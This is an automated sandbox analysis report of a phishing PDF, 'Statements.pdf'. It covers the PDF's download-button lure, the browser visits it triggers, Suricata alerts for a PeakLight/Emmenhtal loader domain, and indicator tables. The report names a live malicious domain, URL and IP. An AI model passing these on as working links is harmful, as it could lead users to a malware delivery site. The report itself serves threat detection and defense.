Edit tour

Windows Analysis Report
Statements.pdf

Overview

General Information

Sample name:	Statements.pdf
Analysis ID:	1579045
MD5:	eaf880556764d7865d9397ec49986abd
SHA1:	50ac5cc2959544ce66105d20504847339986a1ae
SHA256:	e495dc7dda97b75d4824d22b981905545098983da53307a3008d688854c2d752
Tags:	pdfuser-smica83
Infos:

Detection

WinSearchAbuse

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

Yara detected WinSearchAbuse

AI detected landing page (webpage, office document or email)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

Acrobat.exe (PID: 3560 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Statements.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 320 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 5476 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1524,i,11376464214998597370,10738418600549799697,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

chrome.exe (PID: 8132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://desbullariamos.sa.com/Scanned.php" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,1564366894053851536,3153914400913891470,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_203	JoeSecurity_WinSearchAbuse	Yara detected WinSearchAbuse	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_WinSearchAbuse	Yara detected WinSearchAbuse	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ET MALWARE Observed DNS Query to PeakLight/Emmenhtal Domain (desbullariamos .sa .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T18:11:30.168418+0100	2058070	1	A Network Trojan was detected	192.168.2.5	50540	1.1.1.1	53	UDP
2024-12-20T18:11:30.168542+0100	2058070	1	A Network Trojan was detected	192.168.2.5	61816	1.1.1.1	53	UDP

ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T18:11:32.560460+0100	2058073	1	A Network Trojan was detected	192.168.2.5	49756	172.93.120.113	443	TCP
2024-12-20T18:11:32.560636+0100	2058073	1	A Network Trojan was detected	192.168.2.5	49757	172.93.120.113	443	TCP
2024-12-20T18:11:34.918209+0100	2058073	1	A Network Trojan was detected	192.168.2.5	49765	172.93.120.113	443	TCP

ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery Template Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T18:11:34.236493+0100	2058178	1	A Network Trojan was detected	172.93.120.113	443	192.168.2.5	49757	TCP

ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery WebPage Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T18:11:34.236493+0100	2058179	1	A Network Trojan was detected	172.93.120.113	443	192.168.2.5	49757	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected landing page (webpage, office document or email)

Source: PDF document	Joe Sandbox AI: Page contains button: 'Download' Source: 'PDF document'
Source: PDF document	Joe Sandbox AI: PDF document contains prominent button: 'download'

Software Vulnerabilities

Yara detected WinSearchAbuse

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_203, type: DROPPED

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058070 - Severity 1 - ET MALWARE Observed DNS Query to PeakLight/Emmenhtal Domain (desbullariamos .sa .com) : 192.168.2.5:61816 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058070 - Severity 1 - ET MALWARE Observed DNS Query to PeakLight/Emmenhtal Domain (desbullariamos .sa .com) : 192.168.2.5:50540 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058073 - Severity 1 - ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI) : 192.168.2.5:49765 -> 172.93.120.113:443
Source: Network traffic	Suricata IDS: 2058073 - Severity 1 - ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI) : 192.168.2.5:49756 -> 172.93.120.113:443
Source: Network traffic	Suricata IDS: 2058073 - Severity 1 - ET MALWARE Observed PeakLight/Emmenhtal Domain (desbullariamos .sa .com in TLS SNI) : 192.168.2.5:49757 -> 172.93.120.113:443
Source: Network traffic	Suricata IDS: 2058178 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery Template Observed : 172.93.120.113:443 -> 192.168.2.5:49757
Source: Network traffic	Suricata IDS: 2058179 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery WebPage Observed : 172.93.120.113:443 -> 192.168.2.5:49757

Source: Joe Sandbox View	IP Address: 68.183.112.81 68.183.112.81
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Scanned.php HTTP/1.1Host: desbullariamos.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Scanned.html HTTP/1.1Host: desbullariamos.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://desbullariamos.sa.com/Scanned.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1Host: winaero.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://desbullariamos.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1Host: winaero.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: desbullariamos.sa.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: winaero.com

Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_200.9.dr	String found in binary or memory: https://desbullariamos.sa.com/Scanned.html
Source: Statements.pdf	String found in binary or memory: https://desbullariamos.sa.com/Scanned.php)
Source: chromecache_203.9.dr	String found in binary or memory: https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: classification engine

Classification label: mal60.expl.winPDF@37/64@9/5

Source: Statements.pdf	Initial sample: https://desbullariamos.sa.com/Scanned.php
Source: Statements.pdf	Initial sample: https://desbullariamos.sa.com/scanned.php

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6760

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-20 12-11-06-566.log

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Statements.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1524,i,11376464214998597370,10738418600549799697,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://desbullariamos.sa.com/Scanned.php"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,1564366894053851536,3153914400913891470,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1524,i,11376464214998597370,10738418600549799697,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,1564366894053851536,3153914400913891470,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Statements.pdf	Initial sample: PDF keyword /JS count = 0
Source: Statements.pdf	Initial sample: PDF keyword /JavaScript count = 0

Source: Statements.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Spearphishing Link	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Statements.pdf	5%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
winaero.com	68.183.112.81	true	false	high
www.google.com	172.217.19.228	true	false	high
desbullariamos.sa.com	172.93.120.113	true	true	unknown
x1.i.lencr.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png	false	high
https://desbullariamos.sa.com/Scanned.php	true	unknown
https://desbullariamos.sa.com/Scanned.html	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.2.dr	false		high
https://desbullariamos.sa.com/Scanned.php)	Statements.pdf	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
68.183.112.81	winaero.com	United States	14061	DIGITALOCEAN-ASNUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.93.120.113	desbullariamos.sa.com	United States	393960	HOST4GEEKS-LLCUS	true

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579045
Start date and time:	2024-12-20 18:10:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Statements.pdf
Detection:	MAL
Classification:	mal60.expl.winPDF@37/64@9/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .pdf Found PDF document Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.137, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 162.159.61.3, 172.64.41.3, 23.193.114.18, 23.193.114.26, 23.203.161.57, 2.19.126.143, 2.19.126.149, 192.229.221.95, 199.232.210.172, 142.250.181.99, 172.217.19.206, 64.233.162.84, 142.250.181.142, 172.217.19.170, 172.217.19.202, 172.217.19.10, 216.58.208.234, 172.217.17.74, 172.217.17.42, 142.250.181.138, 142.250.181.74, 142.250.181.106, 172.217.19.234, 172.217.21.42, 2.20.68.201, 2.20.68.210, 172.217.17.35, 92.122.16.236, 23.195.76.153, 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Statements.pdf

Simulations

Behavior and APIs

Time	Type	Description
12:11:18	API Interceptor	2x Sleep call for process: AcroCEF.exe modified

Input	Output
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This PDF file is protected", "prominent_button_name": "Download", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://desbullariamos.sa.com/Scanned.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

